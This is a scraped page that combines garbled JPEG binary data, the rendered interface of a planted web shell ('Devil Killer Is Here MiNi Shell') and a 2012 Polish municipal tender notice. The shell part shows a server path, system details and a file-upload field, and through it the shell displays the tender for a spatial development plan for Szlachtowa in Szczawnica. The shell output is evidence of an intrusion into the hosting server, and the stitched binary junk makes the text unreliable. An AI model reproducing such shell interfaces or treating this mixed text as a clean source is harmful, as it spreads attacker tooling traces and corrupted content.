JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120621/213318-N-2012.html

<p class="kh_header"><b>Szczawnica: Przedmiotem zamówienia jest przygotowanie i opracowanie projektu miejscowego planu zagospodarowania przestrzennego dla wsi Szlachtowa w Gminie Szczawnica</b><br>
<b>Numer ogłoszenia: 213318 - 2012; data zamieszczenia: 21.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Szczawnica , ul. Szalaya 103, 34-460 Szczawnica, woj. małopolskie, tel. 018 2622203, 2622530, faks 018 2622530.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczawnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest przygotowanie i opracowanie projektu miejscowego planu zagospodarowania przestrzennego dla wsi Szlachtowa w Gminie Szczawnica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie i opracowanie projektu miejscowego planu zagospodarowania przestrzennego dla wsi Szlachtowa w Gminie Szczawnica oraz wykonanie czynności związanych ze sporządzeniem tego planu wg procedur i problematyki określonej w ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (tekst jednolity Dz. U. z 2003 r. Nr 80 poz. 717 z późn. zm.).

1)	Podstawa opracowania:
Uchwała nr XXII 123 2012 Rady Miejskiej w Szczawnicy z dnia 27 kwietnia 2012 r. w sprawie przystąpienia do opracowania miejscowego planu zagospodarowania przestrzennego Szlachtowa - stanowiąca załącznik do projektu umowy
2)	Obszar i Granice Opracowania:
Obszar urbanistyczny wieś Szlachtowa w Gminie Szczawnicy w granicach administracyjnych wsi (obręb ewidencyjny Szlachtowa) w granicach strefy ochrony uzdrowiskowej C o łącznej powierzchni obszaru - 1.978,00 ha.
3) Przedmiot Opracowania:
Przedmiotem umowy jest przygotowanie i opracowanie projektu miejscowego planu zagospodarowania przestrzennego dla wsi Szlachtowa w Gminie Szczawnica, w tym wykonanie opracowań poprzedzających prace planistyczne, według procedur i problematyki określonych: w ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (tekst jednolity Dz. U. Nr 80 poz. 717 z późn. zm.), zwanej dalej ustawą, w rozporządzeniu Ministra Infrastruktury z dnia 26 sierpnia 2003 r. z sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164 poz. 1587), w rozporządzeniu Prezesa Rady Ministrów z dnia 20 czerwca 2002 r. w sprawie Zasad Techniki Prawodawczej (Dz. U. Nr 100 poz. 908) oraz w ustawach i przepisach odrębnych, odnoszących się do planowania i zagospodarowania przestrzennego.
Projekt planu winien być wykonany w skali zgodnej z art. 16 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (tekst jednolity Dz. U. z 2003 r. Nr 80 poz. 717 z późn. zm.) oraz Rozporządzenia Ministra Infrastruktury dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003 r. Nr 164 poz. 1587), przy czym Zamawiający wymaga opracowania projektu planu w skali 1:2000 dla terenów przeznaczonych do różnych form zabudowy o powierzchni 832,00 ha; w skali 1:5000 dla terenów z zakazem zabudowy o pow. 1.146,00 ha.
4) Charakterystyka i Informacje Dotyczące Obszaru Planu:
Celem miejscowego planu zagospodarowania przestrzennego wsi Szlachtowa w gminie Szczawnica jest ustalenie warunków i standardów kształtowania zabudowy na tym terenie oraz jego przeznaczenia.
Celem planu jest ustalenie zasad zagospodarowania przestrzennego, które pozwolą na uporządkowanie istniejącej zabudowy, wykorzystanie terenu do lokalizacji zabudowy usługowej i mieszkaniowej, zapewniając prawidłową obsługę komunikacyjną i systemowe rozwiązania w zakresie infrastruktury technicznej i komunalnej.
Plan powinien stabilizować zasady zagospodarowania przestrzennego na całym obszarze, poprzez kompleksowe rozwiązania obejmujące dyspozycje funkcjonalno-przestrzenne, uwzględniając relacje z terenami otaczającymi z uwzględnieniem walorów przyrodniczo - krajobrazowych oraz kształtowanie przestrzeni publicznych.
5) Obszar objęty opracowaniem projektu planu znajduje się w:
a) granicach administracyjnych Miasta i Gminy Szczawnica i strefie uzdrowiskowej C,
b) terenach cennych przyrodniczo, objętych ochroną przyrody (parki krajobrazowe, obszary chronionego krajobrazu),
c) terenach, w których występują obszary Natura 2000,
d) obszarze Głównego Zbiornika Wód Podziemnych nr 438 Magura - Nowy Sącz
e) bezpośrednim sąsiedztwie granicy Państwa ze Słowacją
6) Na obszarze objętym opracowaniem projektu obowiązują następujące plany zagospodarowania przestrzennego:
- mpzp dla działki nr 164 1 w Szlachtowej, przyjętego Uchwałą Nr 129 XVIII 95 Rady Miejskiej w Szczawnicy z 27.11.1995r (opublikowany w Dzienniku Urzędowym Woj. Nowosądeckiego Nr 7 96, Poz.25). Zgodnie z ustaleniami ww. planu teren przeznacza się dla lokalizacji zabudowy zagrodowej i mieszkalnej jednorodzinnej;
- mpzp dla działek nr 117,390 68 i 390 72 obejmujących zlokalizowane na Przehybie Radiowo - Telewizyjny Ośrodek nadawczy oraz schronisko, przyjętego Uchwałą Nr 248 XXX 97 Rady Miejskiej w Szczawnicy z 24.03.1997r  (opublikowany w Dzienniku Urzędowym Woj. Małopolskiego Nr 19 97, Poz.68). Zgodnie z ustaleniami ww. planu tereny przeznacza się dla lokalizacji usług turystycznych i rekreacyjnych - schronisko oraz usług telekomunikacji - Radiowotelewizyjny Ośrodek Nadawczy;  
- mpzp dla działki nr 339 w Szlachtowej. Zgodnie z ustaleniami ww. planu teren przeznacza się dla lokalizacji usług i urządzeń komunikacji samochodowej, przyjętego Uchwałą Nr 268 XXXIX 97 Rady Miejskiej w Szczawnicy z 28.07.1997r (opublikowany w Dzienniku Urzędowym Woj. Nowosądeckiego Nr 7 96, Poz.25). 
- mpzp dla działek nr 210, 207 2 w Szlachtowej. Zgodnie z ustaleniami ww. planu teren przeznacza się dla lokalizacji zabudowy mieszkaniowej jednorodzinnej i usług, przyjętego Uchwałą Nr 268 XXXIX 97 Rady Miejskiej w Szczawnicy z 28.07.1997r (opublikowany w Dzienniku Urzędowym Woj. Nowosądeckiego Nr 7 96, Poz.25). 
- mpzp dla działek nr 605 3 4 5, przyjętego Uchwałą Nr 175 XXVIII 01 Rady Miejskiej w Szczawnicy z 26.02.2001r  (opublikowany w Dzienniku Urzędowym Woj. Małopolskiego Nr 37 2001, Poz.570). Zgodnie z ustaleniami ww. planu teren przeznacza się dla lokalizacji zabudowy mieszkalnej jednorodzinnej.  
	Ustalenia wszystkich ww. obowiązujących planów miejscowych w części dotyczącej terenów przeznaczonych do zainwestowania winny zostać uwzględnione w opracowywanym planie.
7) Ponadto w planie należy uwzględnić:
- przyjęty Uchwałą Nr V 9 11 z dnia 25 stycznia 2011roku Rady Miejskiej w Szczawnicy Plan Odnowy Miejscowości Szlachtowa i przyjęte Uchwałą Nr XIII 63 2011 z 15 września 2011 roku: aktualizację Planu Rozwoju Lokalnego Miasta Szczawnica na lata 2007-2012 oraz Wieloletni plan Inwestycyjny dla Miasta Szczawnica na lata 2009 -2015;
- konieczność ochrony wpisanej do rejestru zabytków dawnej cerkwi p.w. MB Pokrownej (obecnie kościół parafialny pod wezwaniem Matki Boskiej Pośredniczki Łask) nr rej. A-1209 M z 10.06.2010 r.;
- konieczność ochrony pomników przyrody - skałki wapienne dec. RLS-op-7140 78 78 z 30.10.1978 r. oraz skałki wapienne Dziad i Baba dec. RLS-op-7140 77 78 z 30.10.1978 r.;
- konieczność ochrony użytku ekologicznego Sztolnie na górze Jarmuta - Rozp. nr 22 Woj. Nowosądeckiego z 28.08.1997 r. (Dz. Urz. Woj. Nowosądeckiego. Nr 38 97, poz.1320).
- strefy ochrony sanitarnej 50 i 150 metrów od granic istniejącego cmentarza parafialnego i realizowanego obecnie cmentarza komunalnego
- konieczność ochrony obiektów wpisanych do Gminnej Ewidencji Zabytków.

Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 7 do SIWZ

Wykonawca zobowiązany będzie dostarczyć ostateczną wersję planu wraz z opracowaniem ekofizjograficznym i analizami (inwentaryzacja, rejestr wniosków i uwag, polityka lokalizacyjna itp.) w formie cyfrowej. Część graficzna ma być wykonana jako zapis w formie hybrydowej (połączenie obrazu rastrowego z wektorowym) umożliwiającej odczytanie i wydrukowanie każdego ze zbioru elementów określonej grupy tematycznej (niezależne pliki), oddzielnie lub kilku plików razem z zachowaniem założonej kolejności ich wyświetlania. Opracowanie graficzne winno być dostarczone w programie, który umożliwia wymianę danych w ogólnie przyjętych standardach.
Program powinien dostarczać zaawansowanych narzędzi graficznych oraz możliwość korzystania z różnego rodzaju danych niegraficznych - pliki tekstowe, bazy danych (ORACLE), oraz podobnych, generowanych przez różnego rodzaju geograficzne systemy informacji (GIS) i systemy informacji przestrzennej (SIP)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2, 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium ustala się w wysokości: 3 000,00 zł (słownie: trzy tysiące złotych 00/100).

Wadium należy wnieść w terminie do dnia 03 lipca 2012 r. do  godz.11:00.

Wadium może być wnoszone w jednej lub kilku następujących formach: 
a)	pieniądzu,
b) 	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) 	gwarancjach bankowych,
d) 	gwarancjach ubezpieczeniowych,
e) 	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158,  z późniejszymi zmianami).
Wadium wnoszone w pieniądzu należy wpłacić na rachunek Urzędu Miasta i Gminy Szczawnica: 
nr rachunku: 22 8817 0000 2001 0000 0589 0106
Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w pokoju nr 14 Urzędu Miasta i Gminy Szczawnica, a  kserokopię (-e) potwierdzoną ( e) za zgodność z oryginałem przez osobę (-y) uprawnioną (-e) do składania oświadczeń woli w imieniu Wykonawcy dołączyć do oferty.
Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował zadanie lub zadania, w co najmniej następującym zakresie:

- co najmniej 1 zamówienie obejmujące swym zakresem wykonanie planu zagospodarowania przestrzennego na powierzchni co najmniej 200 ha, na którym występowały obszary: NATURA 2000, park krajobrazowy lub obszar chronionego krajobrazu, który został uchwalony i opublikowany w Dzienniku Urzędowym Województwa 
- co najmniej 1 zamówienie obejmujące swym zakresem wykonanie planu zagospodarowania przestrzennego na powierzchni co najmniej 50 ha, na którym występowały obszary objęte konserwatorską ochroną dóbr kultury: wpis do rejestru zabytków, który został uchwalony i opublikowany w Dzienniku Urzędowym Województwa
- co najmniej 1 zamówienie obejmujące swym zakresem wykonanie planu zagospodarowania przestrzennego na powierzchni co najmniej 200 ha, na którym występował: obszar statusu uzdrowiska albo status obszaru ochrony uzdrowiskowej, który został uchwalony i opublikowany w Dzienniku Urzędowym Województwa.

Wykonawca winien wykazać, ze wszystkie ww usługi zostały wykonane lub są wykonywane należycie. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów. W takim przypadku Wykonawca winien udowodnić Zamawiającemu, że będzie dysponował tymi zasobami tj. przedstawi pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
Sprawdzenie ww warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawców dokumentów i oświadczeń wg zasady spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi kwalifikacje niezbędne do wykonania zamówienia, tj.: 

- co najmniej 1 osobą wykonującą zawód urbanisty odpowiedzialną za świadczenie usługi, wpisaną na listę członków Izby Urbanistów,
- co najmniej 1 osobą wykonującą zawód architekta odpowiedzialną za świadczenie usługi, wpisaną na listę członków Izby Architektów,
- 1 osobą z doświadczeniem opracowania co najmniej 1 prognozy oddziaływania na środowisko do planu zagospodarowania przestrzennego o powierzchni min. 200 ha, na którym występowały obszary: NATURA 2000,
- 1 osobą z doświadczeniem opracowania co najmniej 1 prognozy skutków finansowych do planu zagospodarowania przestrzennego o powierzchni min. 200 ha, posiadającą uprawnienia rzeczoznawcy majątkowego

Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów. 
W takim przypadku Wykonawca winien udowodnić Zamawiającemu, że będzie dysponował tymi zasobami tj. przedstawi podstawy do dysponowania tymi osobami, a w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Sprawdzenie ww warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawców dokumentów i oświadczeń wg zasady spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać wysokość posiadanych środków finansowych lub zdolność kredytową. Sprawdzenie ww warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawców dokumentów wg zasady spełnia  nie spełnia.

Ponadto, Wykonawca winien wykazać posiadanie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej 500 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>13)	Oświadczenie złożone na podstawie art. 44 Ustawy, że Wykonawca spełnia warunki określone w art. 22 ust. 1 Ustawy  na druku wg załącznika nr 2 pkt 1 do siwz.
14)	Informacja złożona na podstawie art. 36 ust. 4 Ustawy o części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom - oświadczenie zawiera formularz oferty  druk wg załącznika nr 1 do siwz.
